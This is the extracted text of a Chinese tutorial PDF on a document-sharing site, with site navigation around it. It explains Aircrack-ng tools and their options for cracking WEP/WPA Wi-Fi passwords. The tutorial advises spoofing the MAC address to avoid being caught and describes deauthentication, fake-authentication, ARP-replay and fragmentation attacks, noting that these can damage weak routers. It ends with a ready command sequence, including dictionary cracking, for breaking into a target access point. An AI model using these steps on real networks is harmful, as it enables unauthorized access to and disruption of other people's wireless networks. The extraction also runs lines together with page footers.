欢迎来到淘文阁 - 分享文档赚钱的网站! | 帮助中心 好文档才是您的得力助手!
淘文阁 - 分享文档赚钱的网站
全部分类
  • 研究报告>
  • 管理文献>
  • 标准材料>
  • 技术资料>
  • 教育专区>
  • 应用文书>
  • 生活休闲>
  • 考试试题>
  • pptx模板>
  • 工商注册>
  • 期刊短文>
  • 图片设计>
  • ImageVerifierCode 换一换

    2022年aircrack操作实例 .pdf

    • 资源ID:34879725       资源大小:73.49KB        全文页数:8页
    • 资源格式: PDF        下载积分:4.3金币
    快捷下载 游客一键下载
    会员登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录   QQ登录  
    二维码
    微信扫一扫登录
    下载资源需要4.3金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    2022年aircrack操作实例 .pdf

    网上闲逛,google 到这篇文章,看看挺不错,适合初哥。作者功底不错,版权意识也很强,嘻嘻,无线破解攻击工具使用详解http作者 :MHY_MHY 最初发表在 http:/ , 最后修改17:00 2008/11/6。本文主要是针对无线网络的密码破解,使用平台 linux 2.26.21.5 ,实现环境 BACKTRACK 3 FINAL(USB), 无线破解工具 Aircrack-ng ,官方网站http:/www.aircrack-ng .org ,Aircrack-ng系列工具也有 windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 win 从 lin 了,另外 win 下扫描到的 AP 也比 lin 下少了很多。其实 WIN 并不完整的支持 TCP/IP 协议族,有些协议 win 直接丢弃不用。网络本来从一开始就是 unix 的天下, win 只是在后来加入了网络的功能。Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包,干扰另外还要用到以下 linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造 MACiwconfig 主要针对无线网卡的工具 ( 同 ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的 linux 基本命令,我就不提示了。具体破解步骤:1. 修改无线网卡状态:先 dow2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能3. 修改网卡工作模式:进入 Monitor 状态,会产生一个虚拟的网卡4. 修改无线网卡状态: up5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标6. 监听抓包:生成 .cap 或 .ivs 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解下面详细介绍一下各个命令的基本用法(参照命令的英文说明)1. ifconfig用来配 置网卡,我 们这里主要用来 禁用和启用 网卡:名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 1 页,共 8 页 - - - - - - - - - ifconfig ath0 down ifconfig ath0 up 禁用一下网卡的目的是 为了下一步修改 MAC 。2.macchanger用来改 变网卡的 MAC 地址,具体用法如下:usage: macchanger options device-h 显示帮助-V 显示版本-s 显示当前 MAC-e 不改 变 mac,使用 硬件厂商写 入的 MAC-a 自动生成一个同 类型的 MAC ,同 厂商的-A 自动生成一个不同 类型的 MAC ,不同 厂商的-r 生成 任意 MAC-l 显示已知厂商 的网卡 MAC 地址分配,这个很有用,可以 根据 MAC 查出来是哪个厂商生产的产品-m 设置一个自定义的 MAC 如: macchanger -mac =00:34:00:00:00:00 ath0 。3.airmon-ng启动无线网卡进入 Monitor 模式,useage: airmon-ng channel 启动,停止,检测 指定无线网卡channel 监听频道,现代大多数无线 路由默认 是 6 , 随便扫描一下 都是这个 频道,网管们应该换换 了4.iwconfig专用的无线网卡配 置工具,用来配 置特殊 的网络信息,不 带参数时显示可用网络。useage :iwconfig interface optionsessid NN |O N|O FF 指定 essid号 开启关闭nwidNN | on| off 指定网络 id 号 开 启关闭mode managed | ad-hoc | . 指定无线网络工作模式/ 类型freq N.NNNN K| M|G 指定工作 频率channel N 指定频道ap N| off| auto 指定 AP 号 关闭/ 自动sens N sens 号nick N nick 号rate N| auto| fixed 速率控制rts N| auto| fixed| off rts控制,如果不知道什么 是 RTS ,那就回去好好去学 网络,不用 往下看了frag N| auto| fixed| off 碎片控制名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页,共 8 页 - - - - - - - - - enc NNNN-NNNN| off 范围power period N| timeout N 电源 频率/ 超时retry limit N | lifetime N 重试 限次/ 超时txpower Nmw| dBm 功率 毫瓦/ 分贝commit 处理5.iwlist主要用来 显示无线网卡的一些 附加信息 , 同上useage: iwlist interface optionsscanning 扫描frequency 频率channel 频道bitrate 速率rate 速率encryption 加密key 密 钥power 电源txpower 功率ap apaccespoints appeers 直连event 事件6.airodump-ng抓包工具 , 我最 喜欢用的 , 详细用法如下:usage: airodump-ng ,. Options:-ivs :仅将抓取信息 保存为 .ivs-gpsd :使用 GPSd-write :保存为指 定日文件名, 我一 般用这个, 尤其是多个网络 时,指定了也 好区分-w : 同 -write -beacons : 保存所有的 beacons ,默认情况况 下是丢弃 那些无用的数据包的-update :显示更新延迟 ,没有用过-showack : 显示 ack/cts/rts 状态 , 还是 那句, 不 知道 rts就不用看了-h :隐藏已知 的, 配合上面的选项使用-f :跳频时间-berlin : 无数据包接 收时延迟显 示的时间, 这 句不太好翻译 , 意 思是当那个信号发出设备没有发出数据包多少 时间之 后, 就 停止对它的监视.默认 120秒.建议学好英文 去读原文, 翻 译的都会有出入, 这是我的理解.(mhy_mhy注)名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 3 页,共 8 页 - - - - - - - - - -r : 从 指定的文 件读取数据包 . 我也 想有人给我抓好包放哪里 ,呵呵Filter options:-encrypt : 使用密码 序列过滤 AP-netmask : 使用掩码过滤 AP-bssid : 使用 bssid 过滤 AP-a : 过滤无关的客户端默认情况 下使用 2.4Ghz,你也可以 指定其他的 频率,通过以下命令 操作:-channel :指定频道-band :制定带宽-C :指定频率 MHz-cswitch : 设置频道交换 方式0 : FIFO (default) 先进先出(默认)1 : Round Robin 循环2 : Hop on last 最后一跳-s : 同上-help : 显示使用方法,翻译到这里,感觉还是英文的 贴切一点,建议读原文7.aireplay-ng搞破坏的工具, 注意杀伤力 很大,甚至可以损坏劣质 的 AP 设备( 小内存的路由器 可能会重启, 或者彻底被破 坏掉), 我很 喜欢这个东西,相信你也会喜欢的, 使用 时注意分寸.usage: aireplay-ng Filter options:-b bssid : AP的 MAC-d dmac : 目标的 MAC-s smac : 来源的 MAC-m len : 最小包长度-n len : 最大包长度-u type : 帧控制 , type field-v subt : 帧控制 , subtype field-t tods : 帧控制 , To DS bit-f fromds : 帧控制 , From DS bit-w iswep : 帧控制 , WEP bit-D : 禁用 AP 发现功能名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 4 页,共 8 页 - - - - - - - - - Replay options:-x nbpps : 每秒包数量-p fctrl : 框架设 定 (hex)-a bssid : 设置 AP 的 mac-c dmac : 设置目标的 MAC-h smac : 设置来源的 mac-g value : 改变环缓存大 小 (默认 8)-F : 选择第 一个匹配的包Fakeauth attack options:-e essid : 设置目标 AP 的 SSID-o npckts : 每秒爆 破的包数 量 (0 自动, 默认 1)-q sec : 存活时间 秒-y prga : 共享可信的 key 流ARP欺骗原 理 Replay attack options:-j : 注入 fromDS 数据包 , 还没有用过这个选项Fragmentation attack options:-k IP : 设置目的 IP 碎片-l IP : 设置源 IP 碎片Test attack options:-B : 激活 bitrate 测试source options:-i iface : 设置抓包的接 口设备-r file : 从pcap文件析取数据包attack modes (Numbers can still be used): 攻击模式,最具杀伤力 的地方-deauth count : 不信任一切 (-0)-fakeauth delay : 欺骗 AP的信任 (-1)-interactive : 交互的选择 (-2)名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 5 页,共 8 页 - - - - - - - - - -arpreplay : 标准的 ARP欺骗原 理-request replay (-3)-chopchop : 解密 WEP 包 (-4)-fragment : 生成有效的 key流 (-5)-caffe-latte : 从客户端 获取新的 IVs (-6)-cfrag : 对客户端 进行碎片攻击 (-7)-test : 测试注射及 效果 (-9)-help : 显示这个 帮助, 这 部分是全部依照我的使用来 翻译,没有完全 准确的翻译, 主要对付 那些不给出作者就 引用的人, 鄙视抄袭 .8.aircrack-ng破解 KEY,漫长的过程.漫不漫长取决于两 个方面 : 一是网 管的聪明程度( 能否设置出复杂 的密码),二是电脑的速度.usage: aircrack-ng options Common options:-a : 暴破 (1/WEP, 2/WPA-PSK)-e : 选择 essid 为目标-b : 选择 ap的 mac 为目标 , 就是破解识别的关键字-q : 使用安 静模式 , 无数 出模式-C : 将所有的 AP 合并 为一个虚拟的Static WEP cracking options:-c : 仅搜索字母 数字-t : 仅搜索二 进制-h : 搜索数字关键字 ( 用 于坏掉 的部分),翻译不出来了-d : 指定掩码(A1:XX:CF:YY)-m : 用 MAC 匹配可用的数据包-n : WEP 长度 64/128/152/256/512-i : WEP 索引(1 to 4), default: any-f : 暴破强度 默认 2,原文字面意思是 禽兽强迫 捏造 事实,呵呵-k : 禁用一种破解方式 (1 to 17)-x or -x0 : 禁用最新关键字暴 破-x1 : 使用最新关键字暴 破 默认-x2 : 用最新两个字节暴 破-y : 实验单线程模式-K : KoreK 攻击 (pre-PTW)-s : 显示为 ASCII名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 6 页,共 8 页 - - - - - - - - - -M : 最大数量 ivs 使用-D : WEP 非隐蔽 模式-P : PTW debug: 1 disable Klein, 2 PTW-1 : 尝试一次 PTWWEP and WPA-PSK cracking options:-w : 指定目录文 件, 可以多个-r : 制定 airolib-ng 数据库, 不能和 -w 一起使用-help : 显示这个 帮助说明: 作者 : papagogo 时间: 2008-11-21 11:31【接一楼】说明:好 了, 用法 都解释完了 , 主要是后面这三个命令 , 这是我从英文 译过来的, 结合我的使用 情况, 以及我的理解 . 参数全,没有漏掉任何一项, 可能我是第一个把这个完 整 翻译过来的, 之前我没有找到有翻译好 的, 有些地方并不是准确的遵循原文, 希望感兴趣的朋友在转载的时候注上我:mhy_mhy.-下面的命令 集是在你熟悉破解以后用的步骤和上面文章是一样的,只是比 较精简!下面以我的 硬件实例来操作一下:我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:ifconfig ath0 downmacchanger -r ath0macchanger -r wifi0ifconfig ath1 upairmon-ng start ath1 6iwconfig ath1iwlist ath1 scanningairodump-ng -w *.cap -c 6 ath1aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 7 页,共 8 页 - - - - - - - - - aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1 aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1aireplay-ng -3 -b -h -i ath1aircrack-ng -x -f 2 *.capaircrack-ng -w passdict.txt *.capaircrack-ng -n 64 -b apmac *.ivsaircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 8 页,共 8 页 - - - - - - - - -

    注意事项

    本文(2022年aircrack操作实例 .pdf)为本站会员(Che****ry)主动上传,淘文阁 - 分享文档赚钱的网站仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知淘文阁 - 分享文档赚钱的网站(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于淘文阁 - 版权申诉 - 用户使用规则 - 积分规则 - 联系我们

    本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

    工信部备案号:黑ICP备15003705号 © 2020-2023 www.taowenge.com 淘文阁 

    收起
    展开